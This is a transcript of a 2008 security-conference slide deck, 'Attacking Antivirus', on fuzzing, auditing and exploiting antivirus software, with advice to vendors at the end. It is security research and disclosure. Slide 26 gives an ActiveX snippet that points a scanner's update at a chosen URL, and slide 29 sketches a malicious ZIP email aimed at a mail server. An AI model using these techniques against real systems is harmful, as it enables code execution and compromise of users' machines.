Presentation is loading. Please wait.

Presentation is loading. Please wait.

© 2005 Nevis Networks – Proprietary and Confidential 1 2015-8-21 Attacking Antivirus Feng Xue Syscan’08 HongKong.

Published byRandolf Morgan Modified over 9 years ago

Similar presentations

Presentation on theme: "© 2005 Nevis Networks – Proprietary and Confidential 1 2015-8-21 Attacking Antivirus Feng Xue Syscan’08 HongKong."— Presentation transcript:

1 © 2005 Nevis Networks – Proprietary and Confidential 1 2015-8-21 Attacking Antivirus Feng Xue Syscan’08 HongKong

2 © 2005 Nevis Networks – Proprietary and Confidential 2 2015-8-21 Who Am I Technical Lead at Nevis LabsNevis Labs Most of the time working on the – Vulnerability discovery – Vulnerability analysis – M$ Black Tuesday, etc. Discovered over 30 vulnerabilities in the popular software, including Microsoft, Symantec, Apple, Trend Micro, HP, Real Networks, etc.30 vulnerabilities Recently focused on the Antivirus software security – Lots of AV vulnerabilities.

3 © 2005 Nevis Networks – Proprietary and Confidential 3 2015-8-21 Outline Why can AV be targeted Finding vulnerability of Antivirus Exploiting Antivirus Few words for vendors Future work

4 © 2005 Nevis Networks – Proprietary and Confidential 4 2015-8-21 Why Can Antivirus Be Targeted People trust Anti-virus too much – “I am safe, because I have installed an Antivirus!” Antivirus serves the security gate for incoming files What if attackers attack antivirus?

5 © 2005 Nevis Networks – Proprietary and Confidential 5 2015-8-21 Why Can AV Be Targeted - Continue Antivirus is a common component – Over 80% of people are using antivirus software [Reference-8] Cross-platform exploitation – As great as the Java and Adobe vulnerabilities Antivirus is error-prone

6 © 2005 Nevis Networks – Proprietary and Confidential 6 2015-8-21 Why AV is error prone? User input (files being scanned) is totally unpredictable Too many format to deal with – How can AV process hundreds of formats correctly? Lots of the vulnerabilities exist in the following major components of Antivirus engine:  Unpack  Decompression

7 © 2005 Nevis Networks – Proprietary and Confidential 7 2015-8-21 Finding vulnerabilities of Antivirus

8 © 2005 Nevis Networks – Proprietary and Confidential 8 2015-8-21 Audit Antivirus Local Privilege Escalation ActiveX Engine – Source code audit – Reversing – Fuzzing Management

9 © 2005 Nevis Networks – Proprietary and Confidential 9 2015-8-21 Audit - Local Privilege Escalation Weak DACL – Installation Directory. – Service. SC.exe Driver issues – IOCTL handler, Insufficient address space verification. DC2.exe – SSDT Hook. BSODHook.exe – Fuzz the Driver! Investigate the BSOD.

10 © 2005 Nevis Networks – Proprietary and Confidential 10 2015-8-21 Audit - Local Privilege Escalation Demo 1 Rising Antivirus SSDT Hook 0day

11 © 2005 Nevis Networks – Proprietary and Confidential 11 2015-8-21 Audit – ActiveX Control Installed by Antivirus product; Free Online Scan Service; Download Manager Problems: Insecure Method: Design error – CA – SigUpdatePathFTP() – Kaspersky - StartUploading() Buffer Overflow – Symantec, CA, Authentium, RAV, etc

12 © 2005 Nevis Networks – Proprietary and Confidential 12 2015-8-21 Audit – ActiveX Control Fuzzing and Manually audit AxManScript fuzzer for memory corruption ComRaiderGUI fuzzer for memory corruption OleViewManually audit ActiveX FileMon File Operation RegMon Registry Operation TCPview Port, Network connection Wireshark Sniff network traffic

13 © 2005 Nevis Networks – Proprietary and Confidential 13 2015-8-21 Audit – Engine Most of the Engine problem exists in the Format Parsing Memory Corruption – Stack overflow, Heap overflow, Memory Access/Modification Denial of Service – CPU (Most of the AV vulnerable to ZIP/CHM processing problem in the past) – DISK Space (NOD32 will eat N*GB disk space when scanning a malicious ARJ file, Demo2) Detection Bypass

14 © 2005 Nevis Networks – Proprietary and Confidential 14 2015-8-21 Audit – Engine Demo2 NOD32 Disk Space D.o.S

15 © 2005 Nevis Networks – Proprietary and Confidential 15 2015-8-21 Audit – Engine: Source Code Must have access to the source code Time consuming Open Source ClamAV is the best one for practice – 49 CVE matches Tools: Coverity, FlawFinder, RATS,ITS4, SPLINT, CodeScan,

16 © 2005 Nevis Networks – Proprietary and Confidential 16 2015-8-21 Audit – Engine: Reversing Reverse the file format plugin one by one! – Microsoft Windows OneCare: mpengine.dll – Kaspersky: Arj.ppl base64.ppl cab.ppl lha.ppl rar.ppl Typical: Memory allocation, string copy, integer wrapper Advantage: – Effective against all Closed Source AV – Can uncover more subtle vulnerabilities Disadvantage: – Extremely time consuming – Tools: IDA, Hex-rays

17 © 2005 Nevis Networks – Proprietary and Confidential 17 2015-8-21 Audit – Engine: Fuzzing! Few people thought about fuzzing Antivirus Few Antivirus fuzzer published – Vxfuzz – Taviso Fuzzing Antivirus is easier than most of the other fuzzing Even a dozen lines script could uncover many exploitable vulnerabilities!

18 © 2005 Nevis Networks – Proprietary and Confidential 18 2015-8-21 Audit – Engine: Fuzzing! What we need? Good samples – rar, zip, chm, arj, lha, lzh, tar, tgz, doc, xls, upx, fsg, more – CreateARJ, MakeCAB, WACE, WinZIP, WinRAR, PowerISO, various PE packers, Google (filetype:xxx) A big hard disk. – For test case Debugger – Windbg, Ollydbg, Immunitydebugger Fuzzer – Original fuzzer is actually a File generator – Script language: Python/Perl/C – May need to deal with the CRC

19 © 2005 Nevis Networks – Proprietary and Confidential 19 2015-8-21 Audit – Engine: Fuzzing! How? 4 steps Create test case. – By using the script you wrote, samples created – 0xFFFFFFFF, 0xFFFF, 0x0000, 0x0001, etc, Download the trial version AV and install Scan! Do not forget to start the debugger Go to Sleep: Leave your computer fuzzing

20 © 2005 Nevis Networks – Proprietary and Confidential 20 2015-8-21 Audit – Engine: Fuzzing! Demo 3 Fuzzing Mcafee for 0day ;)

21 © 2005 Nevis Networks – Proprietary and Confidential 21 2015-8-21 Audit Result By auditing the mainstream Antivirus Engine, we have found and published: AhnLab AV Remote Kernel Memory Corruption TrendMicro AV UUE Decoding Format String Vulnerability Avast! AV TGZ Parsing Heap Corruption Mcafee AV BZIP2 Parsinig Memory Corruption (working with vendors) NOD32 ARJ Denial Of Service. (working with vendors) OneCare (working with vendors) More upcoming!

22 © 2005 Nevis Networks – Proprietary and Confidential 22 2015-8-21 Audit – Management Client/Server management – Proprietary Protocol – Fuzzing: Sulley, Spike Web Interface – Web server developed by the vendor, or Apache – Lots of webfuzzer available, e.g. webfuzz

23 © 2005 Nevis Networks – Proprietary and Confidential 23 2015-8-21 Exploiting Antivirus

24 © 2005 Nevis Networks – Proprietary and Confidential 24 2015-8-21 Exploiting Antivirus Local Privilege Escalation ActiveX Engine Management (Administrator) Anything else?

25 © 2005 Nevis Networks – Proprietary and Confidential 25 2015-8-21 Local Privilege Escalation Weak DACL (installation Directory /Service) – Can be exploited to gain escalated privileges by simply replacing files in the installation directory! – Symantec, McAfee, TrendMicro,VBA32,Panda, PC Tools, CA eTrust, ZoneAlarm, AVG, BitDefender, Avast!, Kaspersky. – Panda made the mistake twice! CVE-2006-4657 CVE-2007-4191 Driver IOCTL handler issues – Arbitrary memory overwrite. Hooking rarely used system call – Symantec, AVG, ZoneAlarm, Trend Micro, AhnLab Other – Scan job (CA scan job Format String vulnerability)

26 © 2005 Nevis Networks – Proprietary and Confidential 26 2015-8-21 ActiveX - Exploitation Convince the victim to visit a webpage Rising Online Scanner ActiveX Control Insecure Method by John Smith <object classid="clsid:E4E2F180-CB8B-4DE9-ACBB-DA745D3BA 153" id="rav" > rav.BaseURL = "http://www.example.com/"; rav.Encardid = "0000$0000$0000"; rav.UpdateEngine(); olupdate.zip

27 © 2005 Nevis Networks – Proprietary and Confidential 27 2015-8-21 Engine – Exploitation Mail Server Web P2P Email IM

28 © 2005 Nevis Networks – Proprietary and Confidential 28 2015-8-21 Root the Mail Server - continue

29 © 2005 Nevis Networks – Proprietary and Confidential 29 2015-8-21 Root the Mail Server - continue Attachment: Exploit.ZIP Body: whatever Subject: whatever To: CEO.victim@victim.com From: anonymous@anonmoys.com PK………………….?1.5 …………………………. AAAAAAAAAAAAAAAA

30 © 2005 Nevis Networks – Proprietary and Confidential 30 2015-8-21 Root the Mail Server - continue Advantage: Pre-Authentication + 0 Interaction! (The recipients do not need to receive and/or open the malicious emails. ) Disadvantage: Attackers have to figure out which antivirus software is installed on the target mail server, How?

31 © 2005 Nevis Networks – Proprietary and Confidential 31 2015-8-21 Antivirus Remote Fingerprint

32 © 2005 Nevis Networks – Proprietary and Confidential 32 2015-8-21 Antivirus Vendors Will Help You

33 © 2005 Nevis Networks – Proprietary and Confidential 33 2015-8-21 Exploiting the Engine from Web Demo 4 Exploiting AhnLab AV through Web

34 © 2005 Nevis Networks – Proprietary and Confidential 34 2015-8-21 P2P/IM/EMAIL

35 © 2005 Nevis Networks – Proprietary and Confidential 35 2015-8-21 Engine Exploitation - continue Antivirus engine exploitation is just limited by your imagination!

36 © 2005 Nevis Networks – Proprietary and Confidential 36 2015-8-21 Management - Exploitation Client/Server management – e.g. CVE- 2006-0630 Symantec Remote Management BOF, which was later exploited by a variant of SpyBot worm Web Interface – e.g. CVE-2005-2758 Symantec AV Scan Engine Administrative Interface Heap Overflow others – e.g. CVE-2005-0581 CA License Component Multiple buffer overflow vulnerabilities

37 © 2005 Nevis Networks – Proprietary and Confidential 37 2015-8-21 To Antivirus Vendors All the files (being scanned) are evil! Security Development Lifecycle (SDL) ASLR, DEP/NX,etc Code Review PenTest

38 © 2005 Nevis Networks – Proprietary and Confidential 38 2015-8-21 To Antivirus Vendors - continue One Suggestion for the design Is that possible to separate the file format parsing process in a lower privilege service? Does it worth?

39 © 2005 Nevis Networks – Proprietary and Confidential 39 2015-8-21 Future work Security of security products What should we do when the Antivirus fails? What about firewall? IPS? IDS?

40 © 2005 Nevis Networks – Proprietary and Confidential 40 2015-8-21 Questions?

Download ppt "© 2005 Nevis Networks – Proprietary and Confidential 1 2015-8-21 Attacking Antivirus Feng Xue Syscan’08 HongKong."

Similar presentations

Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.

Network Security Attack Analysis. cs490ns - cotter2 Outline Types of Attacks Vulnerabilities Exploited Network Attack Phases Attack Detection Tools.
By Hiranmayi Pai Neeraj Jain

By Hiranmayi Pai Neeraj Jain
Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.

Cybersecurity Training in a Virtual Environment By Chinedum Irrechukwu.
CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.

CHAPTER 2 KNOW YOUR VILLAINS. Who writes it: Malware writers vary in age, income level, location, social/peer interaction, education level, likes, dislikes.
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?

1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Warren Toomey North Coast TAFE Port Macquarie campus

Warren Toomey North Coast TAFE Port Macquarie campus
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
Explanations Of Software Utilities By Tim Wong.

Explanations Of Software Utilities By Tim Wong.
Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.

Building Your Own Firewall Chapter 10. Learning Objectives List and define the two categories of firewalls Explain why desktop firewalls are used Explain.
©2005 Check Point Software Technologies Ltd. Proprietary & Confidential Check Point Software SSL VPN Solutions Technical Overview Thorsten Schuberth Technical.

©2005 Check Point Software Technologies Ltd. Proprietary & Confidential Check Point Software SSL VPN Solutions Technical Overview Thorsten Schuberth Technical.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.

Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Information Networking Security and Assurance Lab National Chung Cheng University 2004/03/031 A Real World Attack: wu-ftp Cao er kai ( 曹爾凱 )

Information Networking Security and Assurance Lab National Chung Cheng University 2004/03/031 A Real World Attack: wu-ftp Cao er kai ( 曹爾凱 )
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.

Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.

Guide to Operating System Security Chapter 2 Viruses, Worms, and Malicious Software.
Internet Relay Chat Chandrea Dungy Derek Garrett #29.

Internet Relay Chat Chandrea Dungy Derek Garrett #29.
Towards Extending the Antivirus Capability to Scan Network Traffic Mohammed I. Al-Saleh Jordan University of Science and Technology.

Towards Extending the Antivirus Capability to Scan Network Traffic Mohammed I. Al-Saleh Jordan University of Science and Technology.
Automating Endpoint Security Policy Enforcement Computing and Networking Services University of Toronto.

Automating Endpoint Security Policy Enforcement Computing and Networking Services University of Toronto.
EICAR 2009, 12 May 2009 Checkvir Realtime Anti-Malware Testing and Certification Dr. Ferenc Leitold, Veszprog Ltd.

EICAR 2009, 12 May 2009 Checkvir Realtime Anti-Malware Testing and Certification Dr. Ferenc Leitold, Veszprog Ltd.
Vulnerabilities. flaws in systems that allow them to be exploited provide means for attackers to compromise hosts, servers and networks.

Vulnerabilities. flaws in systems that allow them to be exploited provide means for attackers to compromise hosts, servers and networks.

Similar presentations

Ads by Google